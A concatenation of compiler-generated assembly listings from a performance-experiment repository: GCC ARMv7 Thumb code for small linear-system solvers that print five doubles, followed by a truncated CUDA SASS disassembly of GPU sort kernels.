fcpyd d4, d0
fldd d0, [sp, #160]
fmscd d4, d10, d7
fldd d10, [sp, #168]
fcpyd d14, d4
fcpyd d4, d1
fldd d1, [sp, #40]
fmscd d4, d10, d7
fstd d4, [sp, #168]
fcpyd d4, d2
fldd d2, [sp, #88]
fmscd d4, d0, d7
fstd d4, [sp, #184]
fldd d4, [sp, #56]
fmuld d10, d5, d2
fldd d2, [sp, #208]
fmuld d4, d12, d4
fmscd d4, d7, d2
fmuld d0, d11, d1
fstd d4, [sp, #160]
fldd d2, [sp, #80]
fmuld d1, d12, d9
fldd d9, [sp, #64]
fmuld d4, d9, d2
fldd d9, [sp, #176]
fmscd d3, d9, d7
fldd d9, [sp, #104]
fstd d3, [sp, #152]
fldd d3, [sp, #56]
fmuld d2, d2, d8
fmuld d3, d11, d3
fcpyd d11, d0
fldd d0, [sp, #72]
fmscd d11, d9, d7
fldd d9, [sp, #128]
fmuld d0, d0, d5
fmscd d1, d9, d7
fstd d0, [sp, #104]
fldd d9, [sp, #96]
fldd d0, [sp, #40]
fmuld d0, d12, d0
fmuld d12, d5, d9
fmscd d10, d6, d15
fldd d15, [sp, #80]
fmuld d5, d5, d15
fstd d10, [sp, #120]
fldd d10, [sp, #88]
fcpyd d15, d2
fcpyd d2, d12
fldd d12, [sp, #184]
fmscd d15, d6, d14
fldd d14, [sp, #104]
fmscd d4, d6, d13
fldd d13, [sp, #168]
fmscd d2, d6, d12
fmscd d14, d6, d13
fstd d2, [sp, #128]
fldd d13, [sp, #64]
fldd d2, [sp, #72]
fstd d14, [sp, #104]
fmuld d12, d13, d9
fldd d9, [sp, #136]
fmuld d14, d13, d10
fmuld d13, d2, d8
fldd d2, [sp, #216]
fmscd d2, d9, d7
fldd d9, [sp, #200]
fstd d2, [sp, #136]
fcpyd d2, d3
fldd d3, [sp, #160]
fmscd d2, d7, d9
fldd d9, [sp, #144]
fmscd d0, d9, d7
fldd d9, [sp, #64]
fmscd d14, d6, d3
fldd d3, [sp, #152]
fmscd d12, d6, d1
fmscd d5, d6, d3
fldd d3, [sp, #72]
fmscd d13, d6, d11
fldd d11, [sp, #96]
fmuld d10, d8, d10
fmuld d9, d9, d3
fldd d3, [sp, #128]
fmuld d8, d8, d11
fldd d11, [sp, #120]
fmuld d1, d4, d3
fldd d3, [sp, #104]
fmuld d11, d4, d11
fmuld d3, d3, d15
fmscd d10, d6, d2
fldd d2, [sp, #136]
fmscd d9, d0, d6
fmscd d8, d6, d2
fldd d2, [sp, #104]
fmscd d1, d5, d12
fldd d12, [sp, #128]
fmscd d11, d5, d14
fldd d14, [sp, #120]
fmscd d3, d5, d13
fldd d13, [sp, #48]
fmuld d0, d15, d14
fmuld d4, d4, d2
fmuld d2, d15, d12
fldd d15, [sp, #80]
fmscd d4, d9, d5
fldd d9, [sp, #72]
fmscd d0, d5, d10
fmscd d2, d5, d8
fmuld d8, d3, d11
fmuld d3, d3, d1
fmscd d8, d4, d0
fldd d0, [sp, #40]
fmscd d3, d4, d2
fldd d2, [sp, #88]
fdivd d3, d8, d3
fnmacd d11, d3, d1
fldd d1, [sp, #32]
fmrrd r2, r3, d3
fdivd d4, d11, d4
fldd d11, [sp, #96]
fnmacd d14, d3, d12
fstd d4, [sp]
fcpyd d10, d14
fldd d14, [sp, #104]
fnmacd d2, d3, d11
fnmacd d10, d4, d14
fdivd d10, d10, d5
fldd d5, [sp, #56]
fnmacd d2, d4, d9
fstd d10, [sp, #8]
fnmacd d2, d10, d15
fnmacd d5, d1, d3
fldd d1, [sp, #112]
fdivd d2, d2, d6
fcpyd d6, d5
fstd d2, [sp, #16]
fnmacd d6, d0, d4
fnmacd d6, d13, d10
fnmacd d6, d1, d2
fdivd d7, d6, d7
fstd d7, [sp, #24]
bl printf
movs r0, #0
add sp, sp, #468
@ sp needed
fldmfdd sp!, {d8-d15}
pop {r4, r5, pc}
.size main, .-main
.section .rodata
.align 3
.LANCHOR0 = . + 0
.LC0:
.word 858993459
.word 1075524403
.word 858993459
.word -1072155853
.word -858993459
.word -1076048692
.word 171798692
.word 1075880919
.word 1030792151
.word -1071425782
.word -1374389535
.word -1073684153
.word 1717986918
.word -1073060250
.word 171798692
.word 1074045911
.word 2061584302
.word 1074114068
.word 687194767
.word -1072394404
.word 171798692
.word 1075225559
.word -687194767
.word 1075146915
.word -1717986918
.word -1073374823
.word 1717986918
.word 1074882150
.word 1889785610
.word -1071838659
.word -1374389535
.word 1075306823
.word 1546188227
.word -1072577905
.word 343597384
.word 1070679982
.word 2061584302
.word -1071862252
.word -2061584302
.word 1075335659
.word -1889785610
.word 1075869122
.word 343597384
.word 1072777134
.word -515396076
.word 1075975290
.word 1374389535
.word 1073815224
.word 1202590843
.word -1071940895
.LC1:
.word -515396076
.word 1074795642
.word 1546188227
.word 1075364495
.word -687194767
.word -1071615837
.word 343597384
.word -1071757394
.word -1546188227
.word -1073201808
.section .rodata.str1.4,"aMS",%progbits,1
.align 2
.LC2:
.ascii "%f, %f, %f, %f, %f\012\000"
.ident "GCC: (Debian 4.9.2-10) 4.9.2"
.section .note.GNU-stack,"",%progbits
|
akalenuk/wordsandbuttons
| 1,357
|
exp/static_c/exp/arm_asm/exp_static_a_b.s
|
.syntax unified
.arch armv7-a
.eabi_attribute 27, 3
.eabi_attribute 28, 1
.fpu vfpv3-d16
.eabi_attribute 20, 1
.eabi_attribute 21, 1
.eabi_attribute 23, 3
.eabi_attribute 24, 1
.eabi_attribute 25, 1
.eabi_attribute 26, 2
.eabi_attribute 30, 2
.eabi_attribute 34, 1
.eabi_attribute 18, 4
.thumb
.file "exp_static_a_b.c"
.section .text.startup,"ax",%progbits
.align 2
.global main
.thumb
.thumb_func
.type main, %function
main:
@ args = 0, pretend = 0, frame = 0
@ frame_needed = 0, uses_anonymous_args = 0
push {r4, r5, r6, r7, r8, r9, r10, fp, lr}
sub sp, sp, #36
adr fp, .L3
ldrd r10, [fp]
movw r0, #:lower16:.LC2
adr r9, .L3+8
ldrd r8, [r9]
movt r0, #:upper16:.LC2
adr r7, .L3+16
ldrd r6, [r7]
adr r5, .L3+24
ldrd r4, [r5]
adr r3, .L3+32
ldrd r2, [r3]
strd r10, [sp]
strd r8, [sp, #8]
strd r6, [sp, #16]
strd r4, [sp, #24]
bl printf
movs r0, #0
add sp, sp, #36
@ sp needed
pop {r4, r5, r6, r7, r8, r9, r10, fp, pc}
.L4:
.align 3
.L3:
.word 232640199
.word -1075429521
.word 83248120
.word 1071841626
.word -1063973261
.word 1073030601
.word -1120311528
.word 1071782572
.word 87906252
.word -1075208333
.size main, .-main
.section .rodata.str1.4,"aMS",%progbits,1
.align 2
.LC2:
.ascii "%f, %f, %f, %f, %f\012\000"
.ident "GCC: (Debian 4.9.2-10) 4.9.2"
.section .note.GNU-stack,"",%progbits
|
akalenuk/wordsandbuttons
| 3,725
|
exp/static_c/exp/arm_asm/exp_static_a_volatile_b.s
|
.syntax unified
.arch armv7-a
.eabi_attribute 27, 3
.eabi_attribute 28, 1
.fpu vfpv3-d16
.eabi_attribute 20, 1
.eabi_attribute 21, 1
.eabi_attribute 23, 3
.eabi_attribute 24, 1
.eabi_attribute 25, 1
.eabi_attribute 26, 2
.eabi_attribute 30, 2
.eabi_attribute 34, 1
.eabi_attribute 18, 4
.thumb
.file "exp_static_a_volatile_b.c"
.section .text.startup,"ax",%progbits
.align 2
.global main
.thumb
.thumb_func
.type main, %function
main:
@ args = 0, pretend = 0, frame = 40
@ frame_needed = 0, uses_anonymous_args = 0
push {r4, r5, lr}
movw r4, #:lower16:.LANCHOR0
fstmfdd sp!, {d8, d9, d10, d11, d12, d13, d14, d15}
movt r4, #:upper16:.LANCHOR0
ldmia r4!, {r0, r1, r2, r3}
fldd d1, .L3
sub sp, sp, #76
add r5, sp, #32
fldd d14, .L3+8
stmia r5!, {r0, r1, r2, r3}
ldmia r4!, {r0, r1, r2, r3}
fldd d3, .L3+16
stmia r5!, {r0, r1, r2, r3}
ldmia r4, {r0, r1}
fldd d4, .L3+24
stmia r5, {r0, r1}
movw r0, #:lower16:.LC2
fldd d0, [sp, #32]
movt r0, #:upper16:.LC2
fldd d8, [sp, #40]
fldd d9, [sp, #48]
fldd d10, [sp, #56]
fldd d13, [sp, #64]
fldd d2, .L3+32
fmuld d1, d13, d1
fldd d5, .L3+40
fldd d15, .L3+48
fldd d6, .L3+56
fldd d7, .L3+64
fldd d11, .L3+72
fldd d12, .L3+80
fmscd d1, d10, d14
fmuld d3, d13, d3
fmuld d4, d13, d4
fmscd d3, d9, d14
fldd d9, .L3+88
fcpyd d10, d1
fldd d1, .L3+96
fmuld d2, d10, d2
fmscd d4, d8, d14
fldd d8, .L3+104
fmuld d5, d13, d5
fmscd d2, d3, d15
fldd d3, .L3+112
fmuld d6, d10, d6
fmscd d5, d0, d14
fldd d0, .L3+120
fmscd d6, d4, d15
fldd d4, .L3+128
fmuld d7, d10, d7
fmuld d11, d2, d11
fmscd d7, d5, d15
fldd d5, .L3+136
fmuld d12, d2, d12
fmscd d11, d6, d5
fldd d6, .L3+144
fmscd d12, d7, d5
fldd d5, .L3+152
fldd d7, .L3+160
fmuld d1, d11, d1
fmscd d1, d12, d8
fdivd d3, d1, d3
fldd d1, .L3+168
fnmacd d11, d3, d0
fldd d0, .L3+176
fmrrd r2, r3, d3
fdivd d11, d11, d8
fnmacd d2, d3, d9
fstd d11, [sp]
fnmacd d2, d11, d1
fldd d1, .L3+136
fdivd d2, d2, d1
fcpyd d1, d10
fstd d2, [sp, #8]
fnmacd d1, d3, d0
fldd d0, .L3+184
fnmacd d1, d11, d0
fldd d0, .L3+192
fnmacd d1, d2, d0
fnmacd d13, d3, d4
fdivd d1, d1, d15
fnmacd d13, d11, d5
fstd d1, [sp, #16]
fnmacd d13, d2, d6
fnmacd d13, d1, d7
fdivd d14, d13, d14
fstd d14, [sp, #24]
bl printf
movs r0, #0
add sp, sp, #76
@ sp needed
fldmfdd sp!, {d8-d15}
pop {r4, r5, pc}
.L4:
.align 3
.L3:
.word -2061584302
.word 1075335659
.word 1202590843
.word -1071940895
.word 1889785610
.word -1071838659
.word 687194767
.word -1072394404
.word 700938662
.word -1070812614
.word 1030792151
.word -1071425782
.word -577243605
.word 1078075283
.word 886481250
.word -1071744785
.word 54975582
.word -1069401224
.word 236911768
.word 1082328925
.word -1811830240
.word 1083368220
.word 1742044232
.word -1065275150
.word 1087982832
.word 1096468689
.word -2109574618
.word 1095227578
.word -771634347
.word -1027562791
.word 2081240824
.word 1095358424
.word -1889785610
.word 1075869122
.word -1018708519
.word 1084323836
.word -515396076
.word 1075975290
.word 343597384
.word 1072777134
.word 1374389535
.word 1073815224
.word -1845343351
.word -1064953704
.word -501652180
.word -1068055720
.word -384829069
.word 1077407671
.word -2144047675
.word -1068734281
.size main, .-main
.section .rodata
.align 3
.LANCHOR0 = . + 0
.LC1:
.word -515396076
.word 1074795642
.word 1546188227
.word 1075364495
.word -687194767
.word -1071615837
.word 343597384
.word -1071757394
.word -1546188227
.word -1073201808
.section .rodata.str1.4,"aMS",%progbits,1
.align 2
.LC2:
.ascii "%f, %f, %f, %f, %f\012\000"
.ident "GCC: (Debian 4.9.2-10) 4.9.2"
.section .note.GNU-stack,"",%progbits
|
akalenuk/wordsandbuttons
| 6,140
|
exp/static_c/exp/arm_asm/exp_runtime.s
|
.syntax unified
.arch armv7-a
.eabi_attribute 27, 3
.eabi_attribute 28, 1
.fpu vfpv3-d16
.eabi_attribute 20, 1
.eabi_attribute 21, 1
.eabi_attribute 23, 3
.eabi_attribute 24, 1
.eabi_attribute 25, 1
.eabi_attribute 26, 2
.eabi_attribute 30, 2
.eabi_attribute 34, 1
.eabi_attribute 18, 4
.thumb
.file "exp_runtime.c"
.text
.align 2
.global aijn
.thumb
.thumb_func
.type aijn, %function
aijn:
@ args = 8, pretend = 0, frame = 0
@ frame_needed = 0, uses_anonymous_args = 0
push {r4, r5, r6, r7, r8, r9, r10, lr}
mov r5, r0
fstmfdd sp!, {d8, d9}
mov lr, r2
mov r9, r3
sub sp, sp, #8
ldr r4, [sp, #56]
ldr r6, [sp, #60]
cmp r4, r6
beq .L6
add r10, r4, #1
str r6, [sp, #4]
str r10, [sp]
mov r7, r1
mov r8, r2
bl aijn
mov r0, r5
mov r1, r7
mov r2, r4
mov r3, r4
str r10, [sp]
str r6, [sp, #4]
fcpyd d8, d0
bl aijn
mov r2, r8
mov r0, r5
mov r1, r7
mov r3, r4
str r10, [sp]
str r6, [sp, #4]
fmuld d8, d8, d0
bl aijn
str r10, [sp]
mov r0, r5
str r6, [sp, #4]
mov r1, r7
mov r2, r4
mov r3, r9
fcpyd d9, d0
bl aijn
fnmacd d8, d9, d0
fcpyd d0, d8
add sp, sp, #8
@ sp needed
fldmfdd sp!, {d8-d9}
pop {r4, r5, r6, r7, r8, r9, r10, pc}
.L6:
mla r4, r2, r4, r3
add r5, r0, r4, lsl #3
fldd d0, [r5]
add sp, sp, #8
@ sp needed
fldmfdd sp!, {d8-d9}
pop {r4, r5, r6, r7, r8, r9, r10, pc}
.size aijn, .-aijn
.align 2
.global bin
.thumb
.thumb_func
.type bin, %function
bin:
@ args = 4, pretend = 0, frame = 0
@ frame_needed = 0, uses_anonymous_args = 0
push {r4, r5, r6, r7, r8, r9, lr}
mov r5, r1
fstmfdd sp!, {d8, d9}
mov r4, r3
sub sp, sp, #12
ldr r6, [sp, #56]
cmp r3, r6
beq .L11
add r9, r3, #1
mov r8, r2
str r6, [sp, #4]
mov r2, r3
str r9, [sp]
mov r7, r0
bl aijn
mov r3, r9
mov r0, r7
mov r1, r5
mov r2, r8
str r6, [sp]
fcpyd d8, d0
bl bin
mov r2, r8
mov r0, r7
mov r1, r5
mov r3, r4
str r9, [sp]
str r6, [sp, #4]
fmuld d8, d8, d0
bl aijn
mov r3, r9
str r6, [sp]
mov r0, r7
mov r1, r5
mov r2, r4
fcpyd d9, d0
bl bin
fnmacd d8, d9, d0
fcpyd d0, d8
add sp, sp, #12
@ sp needed
fldmfdd sp!, {d8-d9}
pop {r4, r5, r6, r7, r8, r9, pc}
.L11:
add r5, r1, r2, lsl #3
fldd d0, [r5]
add sp, sp, #12
@ sp needed
fldmfdd sp!, {d8-d9}
pop {r4, r5, r6, r7, r8, r9, pc}
.size bin, .-bin
.align 2
.global solve_xi
.thumb
.thumb_func
.type solve_xi, %function
solve_xi:
@ args = 4, pretend = 0, frame = 0
@ frame_needed = 0, uses_anonymous_args = 0
push {r4, r5, r6, r7, r8, r9, r10, fp, lr}
add r8, r3, #1
fstmfdd sp!, {d8}
mov r5, r3
mov fp, r2
mov r2, r3
mov r3, r8
mov r10, r0
mov r9, r1
sub sp, sp, #12
ldr r7, [sp, #56]
str r7, [sp]
bl bin
cmp r5, #0
fcpyd d8, d0
ble .L13
mov r6, fp
movs r4, #0
.L14:
mov r3, r4
str r8, [sp]
mov r0, r10
str r7, [sp, #4]
mov r1, r9
mov r2, r5
bl aijn
fldmiad r6!, {d7}
adds r4, r4, #1
cmp r4, r5
fnmacd d8, d0, d7
bne .L14
.L13:
mov r2, r5
mov r3, r5
str r8, [sp]
mov r0, r10
str r7, [sp, #4]
mov r1, r9
bl aijn
add r5, fp, r5, lsl #3
fdivd d0, d8, d0
fstd d0, [r5]
add sp, sp, #12
@ sp needed
fldmfdd sp!, {d8}
pop {r4, r5, r6, r7, r8, r9, r10, fp, pc}
.size solve_xi, .-solve_xi
.align 2
.global runtime_solve
.thumb
.thumb_func
.type runtime_solve, %function
runtime_solve:
@ args = 0, pretend = 0, frame = 0
@ frame_needed = 0, uses_anonymous_args = 0
cmp r3, #0
ble .L23
push {r4, r5, r6, r7, r8, lr}
sub sp, sp, #8
mov r5, r3
mov r8, r2
mov r7, r1
mov r6, r0
movs r4, #0
.L18:
mov r3, r4
str r5, [sp]
mov r0, r6
mov r1, r7
mov r2, r8
adds r4, r4, #1
bl solve_xi
cmp r4, r5
bne .L18
add sp, sp, #8
@ sp needed
pop {r4, r5, r6, r7, r8, pc}
.L23:
bx lr
.size runtime_solve, .-runtime_solve
.section .text.startup,"ax",%progbits
.align 2
.global main
.thumb
.thumb_func
.type main, %function
main:
@ args = 0, pretend = 0, frame = 280
@ frame_needed = 0, uses_anonymous_args = 0
push {r4, r5, r6, r7, r8, r9, r10, fp, lr}
movw r1, #:lower16:.LANCHOR0
ldr r6, .L28
sub sp, sp, #316
movt r1, #:upper16:.LANCHOR0
movs r2, #200
add r0, sp, #112
add r5, sp, #32
bl memcpy
ldmia r6!, {r0, r1, r2, r3}
movs r4, #0
movs r7, #5
stmia r5!, {r0, r1, r2, r3}
ldmia r6!, {r0, r1, r2, r3}
stmia r5!, {r0, r1, r2, r3}
ldmia r6, {r0, r1}
stmia r5, {r0, r1}
.L25:
mov r3, r4
str r7, [sp]
add r0, sp, #112
add r1, sp, #32
add r2, sp, #72
adds r4, r4, #1
bl solve_xi
cmp r4, #5
bne .L25
ldrd r10, [sp, #80]
movw r0, #:lower16:.LC2
ldrd r8, [sp, #88]
movt r0, #:upper16:.LC2
ldrd r6, [sp, #96]
ldrd r4, [sp, #104]
ldrd r2, [sp, #72]
strd r10, [sp]
strd r8, [sp, #8]
strd r6, [sp, #16]
strd r4, [sp, #24]
bl printf
movs r0, #0
add sp, sp, #316
@ sp needed
pop {r4, r5, r6, r7, r8, r9, r10, fp, pc}
.L29:
.align 2
.L28:
.word .LANCHOR0+200
.size main, .-main
.section .rodata
.align 3
.LANCHOR0 = . + 0
.LC0:
.word 858993459
.word 1075524403
.word 858993459
.word -1072155853
.word -858993459
.word -1076048692
.word 171798692
.word 1075880919
.word 1030792151
.word -1071425782
.word -1374389535
.word -1073684153
.word 1717986918
.word -1073060250
.word 171798692
.word 1074045911
.word 2061584302
.word 1074114068
.word 687194767
.word -1072394404
.word 171798692
.word 1075225559
.word -687194767
.word 1075146915
.word -1717986918
.word -1073374823
.word 1717986918
.word 1074882150
.word 1889785610
.word -1071838659
.word -1374389535
.word 1075306823
.word 1546188227
.word -1072577905
.word 343597384
.word 1070679982
.word 2061584302
.word -1071862252
.word -2061584302
.word 1075335659
.word -1889785610
.word 1075869122
.word 343597384
.word 1072777134
.word -515396076
.word 1075975290
.word 1374389535
.word 1073815224
.word 1202590843
.word -1071940895
.LC1:
.word -515396076
.word 1074795642
.word 1546188227
.word 1075364495
.word -687194767
.word -1071615837
.word 343597384
.word -1071757394
.word -1546188227
.word -1073201808
.section .rodata.str1.4,"aMS",%progbits,1
.align 2
.LC2:
.ascii "%f, %f, %f, %f, %f\012\000"
.ident "GCC: (Debian 4.9.2-10) 4.9.2"
.section .note.GNU-stack,"",%progbits
|
akalenuk/wordsandbuttons
| 320,714
|
exp/cuda/GTX1050Ti/benchmark.s
|
Fatbin elf code:
================
arch = sm_61
code version = [1,7]
producer = <unknown>
host = linux
compile_size = 64bit
code for sm_61
Fatbin elf code:
================
arch = sm_61
code version = [1,7]
producer = <unknown>
host = linux
compile_size = 64bit
code for sm_61
Function : _Z9nano_sortPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { IADD32I R1, R1, -0x18 ; /* 0x1c0ffffffe870101 */
/*0018*/ S2R R16, SR_CTAID.X }
/* 0xf0c8000002570010 */
/* 0x001ffc00e62007f0 */
/*0028*/ { MOV R23, RZ ; /* 0x5c9807800ff70017 */
/*0030*/ S2R R2, SR_TID.X }
/* 0xf0c8000002170002 */
/*0038*/ MOV32I R0, 0xffffff02 ; /* 0x010ffffff027f000 */
/* 0x001fd842fec20ff1 */
/*0048*/ XMAD.MRG R3, R16.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000271003 */
/*0050*/ XMAD R2, R16.reuse, c[0x0] [0x8], R2 ; /* 0x4e00010000271002 */
/*0058*/ XMAD.PSL.CBCC R16, R16.H1, R3.H1, R2 ; /* 0x5b30011800371010 */
/* 0x081fc400fc2007e6 */
/*0068*/ MOV R3, R16 ; /* 0x5c98078001070003 */
/*0070*/ SHR.U32 R2, R3, 0x1e ; /* 0x3828000001e70302 */
/*0078*/ IADD32I R8, R3.reuse, 0x1 ; /* 0x1c00000000170308 */
/* 0x001f8400fe8007e1 */
/*0088*/ ISCADD R6.CC, R3, c[0x0][0x140], 0x2 ; /* 0x4c18810005070306 */
/*0090*/ IADD32I R17, R3, 0x2 ; /* 0x1c00000000270311 */
/*0098*/ SHR.U32 R4, R8, 0x1e ; /* 0x3828000001e70804 */
/* 0x001ec400fe0007f2 */
/*00a8*/ IADD.X R7, R2, c[0x0][0x144] ; /* 0x4c10080005170207 */
/*00b0*/ { ISCADD R8.CC, R8, c[0x0][0x140], 0x2 ; /* 0x4c18810005070808 */
/*00b8*/ LDG.E R7, [R6] }
/* 0xeed4200000070607 */
/* 0x001fc000fe4007e5 */
/*00c8*/ SHR.U32 R2, R17, 0x1e ; /* 0x3828000001e71102 */
/*00d0*/ IADD.X R9, R4, c[0x0][0x144] ; /* 0x4c10080005170409 */
/*00d8*/ { ISCADD R4.CC, R17, c[0x0][0x140], 0x2 ; /* 0x4c18810005071104 */
/* 0x001ec800fe0007f6 */
/*00e8*/ LDG.E R20, [R8] }
/* 0xeed4200000070814 */
/*00f0*/ { IADD.X R5, R2, c[0x0][0x144] ; /* 0x4c10080005170205 */
/*00f8*/ LDG.E R2, [R8] }
/* 0xeed4200000070802 */
/* 0x081fc000f6c007f0 */
/*0108*/ { IADD32I R12, R3, 0x3 ; /* 0x1c0000000037030c */
/*0110*/ LDG.E R28, [R4] }
/* 0xeed420000007041c */
/*0118*/ { SHR.U32 R3, R12.reuse, 0x1e ; /* 0x3828000001e70c03 */
/* 0x001f8800fcc000b1 */
/*0128*/ LDG.E R14, [R4] }
/* 0xeed420000007040e */
/*0130*/ ISCADD R12.CC, R12, c[0x0][0x140], 0x2 ; /* 0x4c18810005070c0c */
/*0138*/ IADD.X R13, R3, c[0x0][0x144] ; /* 0x4c1008000517030d */
/* 0x003c4400fe6007b5 */
/*0148*/ LDG.E R15, [R12] ; /* 0xeed4200000070c0f */
/*0150*/ DEPBAR.LE SB5, 0x4 ; /* 0xf0f0000034470000 */
/*0158*/ F2F.F64.F32 R4, R7 ; /* 0x5ca8000000770b04 */
/* 0x003fc440fe0007f3 */
/*0168*/ DEPBAR.LE SB5, 0x2 ; /* 0xf0f0000034270000 */
/*0170*/ { FSET.GT.AND R3, R7.reuse, R2, PT ; /* 0x5804038000270703 */
/*0178*/ STL.64 [R1], R4 }
/* 0xef55000000070104 */
/* 0x001fc4c0fe2007e1 */
/*0188*/ FSET.GT.AND R6, R7, R28, PT ; /* 0x5804038001c70706 */
/*0190*/ FSET.GE.AND R11, R2.reuse, R7.reuse, PT ; /* 0x580603800077020b */
/*0198*/ FSET.GT.AND R10, R2, R28, PT ; /* 0x5804038001c7020a */
/* 0x001fc800fe4207f1 */
/*01a8*/ FSET.GE.AND R18, R28.reuse, R7, PT ; /* 0x5806038000771c12 */
/*01b0*/ FSET.GE.AND R19, R28, R2, PT ; /* 0x5806038000271c13 */
/*01b8*/ IADD3 R6, RZ, -R6, -R3 ; /* 0x5cc601800067ff06 */
/* 0x001fc000e28007e1 */
/*01c8*/ IADD3 R11, RZ, -R10, -R11 ; /* 0x5cc6058000a7ff0b */
/*01d0*/ F2F.F64.F32 R2, R2 ; /* 0x5ca8000000270b02 */
/*01d8*/ { IADD3 R10, RZ, -R19, -R18 ; /* 0x5cc609000137ff0a */
/* 0x001c4080fe400ff1 */
/*01e8*/ STL.64 [R1+0x8], R2 }
/* 0xef55000000870102 */
/*01f0*/ LEA R21, R6, R1.reuse, 0x3 ; /* 0x5bd7018000170615 */
/*01f8*/ { F2F.F64.F32 R28, R28 ; /* 0x5ca8000001c70b1c */
/* 0x001fc080fe4007f1 */
/*0208*/ STL.64 [R21], R4 }
/* 0xef55000000071504 */
/*0210*/ LEA R11, R11, R1.reuse, 0x3 ; /* 0x5bd7018000170b0b */
/*0218*/ { LEA R10, R10, R1, 0x3 ; /* 0x5bd7018000170a0a */
/* 0x0023c460fe0007f2 */
/*0228*/ STL.64 [R11], R2 }
/* 0xef55000000070b02 */
/*0230*/ { FSET.GT.AND R19, R20.reuse, R14, PT ; /* 0x5804038000e71413 */
/*0238*/ STL.64 [R10], R28 }
/* 0xef55000000070a1c */
/* 0x181fc000fe2407f0 */
/*0248*/ { FSET.GT.AND R12, R20, R15.reuse, PT ; /* 0x5804038000f7140c */
/*0250*/ LDL.64 R6, [R1+0x8] }
/* 0xef45000000870106 */
/*0258*/ { FSET.GE.AND R18, R14.reuse, R20.reuse, PT ; /* 0x5806038001470e12 */
/* 0x001ec400fe0007b1 */
/*0268*/ LDL.64 R8, [R1] }
/* 0xef45000000070108 */
/*0270*/ { FSET.GT.AND R24, R14, R15, PT ; /* 0x5804038000f70e18 */
/*0278*/ LDL.64 R4, [R1+0x18] }
/* 0xef45000001870104 */
/* 0x001fc800fe4007e1 */
/*0288*/ FSET.GE.AND R22, R15, R20, PT ; /* 0x5806038001470f16 */
/*0290*/ FSET.GE.AND R13, R15, R14, PT ; /* 0x5806038000e70f0d */
/*0298*/ IADD3 R12, RZ, -R12, -R19 ; /* 0x5cc6098000c7ff0c */
/* 0x001fc400fe4007f2 */
/*02a8*/ IADD3 R24, RZ, -R24, -R18 ; /* 0x5cc609000187ff18 */
/*02b0*/ IADD3 R22, RZ, -R13, -R22 ; /* 0x5cc60b0000d7ff16 */
/*02b8*/ LEA R25, R12, R1, 0x3 ; /* 0x5bd7018000170c19 */
/* 0x005fd001e2000724 */
/*02c8*/ F2F.F64.F32 R12, R15 ; /* 0x5ca8000000f70b0c */
/*02d0*/ { F2F.F64.F32 R10, R20 ; /* 0x5ca8000001470b0a */
/*02d8*/ STL.64 [R1+0x10], R12 }
/* 0xef5500000107010c */
/* 0x101fc001fe800730 */
/*02e8*/ { F2F.F64.F32 R14, R14 ; /* 0x5ca8000000e70b0e */
/*02f0*/ STL.64 [R1], R10 }
/* 0xef5500000007010a */
/*02f8*/ { LEA R24, R24, R1.reuse, 0x3 ; /* 0x5bd7018000171818 */
/* 0x001fc400fe0017f1 */
/*0308*/ STL.64 [R1+0x8], R14 }
/* 0xef5500000087010e */
/*0310*/ { LEA R22, R22, R1, 0x3 ; /* 0x5bd7018000171616 */
/*0318*/ STL.64 [R25], R10 }
/* 0xef5500000007190a */
/* 0x001fc000ffa007f0 */
/*0328*/ { IADD32I R0, R0, 0x2 ; /* 0x1c00000000270000 */
/*0330*/ STL.64 [R24], R14 }
/* 0xef5500000007180e */
/*0338*/ { ISETP.NE.AND P0, PT, R0, RZ, PT ; /* 0x5b6b03800ff70007 */
/* 0x001ec400fe2007f1 */
/*0348*/ STL.64 [R22], R12 }
/* 0xef5500000007160c */
/*0350*/ LDL.64 R18, [R1+0x8] ; /* 0xef45000000870112 */
/*0358*/ LDL.64 R20, [R1] ; /* 0xef45000000070114 */
/* 0x001c7800fe6007ba */
/*0368*/ LDL.64 R2, [R1+0x18] ; /* 0xef45000001870102 */
/*0370*/ DEPBAR.LE SB5, 0x2 ; /* 0xf0f0000034270000 */
/*0378*/ DFMA R6, R6, 2, R8 ; /* 0x3670044000070606 */
/* 0x005c7801e7c00822 */
/*0388*/ DFMA R4, R4, 3, R6 ; /* 0x3670034008070404 */
/*0390*/ F2F.F64.F32 R6, R23 ; /* 0x5ca8000001770b06 */
/*0398*/ DADD R4, R4, R6 ; /* 0x5c70000000670404 */
/* 0x003c4420e6e00f11 */
/*03a8*/ F2F.F32.F64 R4, R4 ; /* 0x5ca8000000470e04 */
/*03b0*/ DFMA R20, R18, 2, R20 ; /* 0x36700a4000071214 */
/*03b8*/ F2F.F64.F32 R4, R4 ; /* 0x5ca8000000470b04 */
/* 0x0020c801e3c0171e */
/*03c8*/ DFMA R2, R2, 3, R20 ; /* 0x36700a4008070202 */
/*03d0*/ DADD R2, R2, R4 ; /* 0x5c70000000470202 */
/*03d8*/ F2F.F32.F64 R23, R2 ; /* 0x5ca8000000270e17 */
/* 0x081fc402ffa00ff0 */
/*03e8*/ { MOV R3, R17 ; /* 0x5c98078001170003 */
/*03f0*/ @P0 BRA 0x70 }
/* 0xe2400fffc780000f */
/*03f8*/ SHR R0, R16.reuse, 0x1e ; /* 0x3829000001e71000 */
/* 0x001fd400fc4007e6 */
/*0408*/ ISCADD R16.CC, R16, c[0x0][0x150], 0x2 ; /* 0x4c18810005471010 */
/*0410*/ IADD.X R17, R0, c[0x0][0x154] ; /* 0x4c10080005570011 */
/*0418*/ STG.E [R16], R23 ; /* 0xeedc200000071017 */
/* 0x001f8000ffe007ff */
/*0428*/ EXIT ; /* 0xe30000000007000f */
/*0430*/ BRA 0x430 ; /* 0xe2400fffff87000f */
/*0438*/ NOP; /* 0x50b0000000070f00 */
................................
Function : _Z4sortPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { MOV32I R28, 0xffffff04 ; /* 0x010ffffff047f01c */
/*0018*/ S2R R0, SR_CTAID.X }
/* 0xf0c8000002570000 */
/* 0x005f9801fc20073f */
/*0028*/ S2R R2, SR_TID.X ; /* 0xf0c8000002170002 */
/*0030*/ XMAD.MRG R3, R0, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270003 */
/*0038*/ XMAD R2, R0, c[0x0] [0x8], R2 ; /* 0x4e00010000270002 */
/* 0x081fc400fc2007f6 */
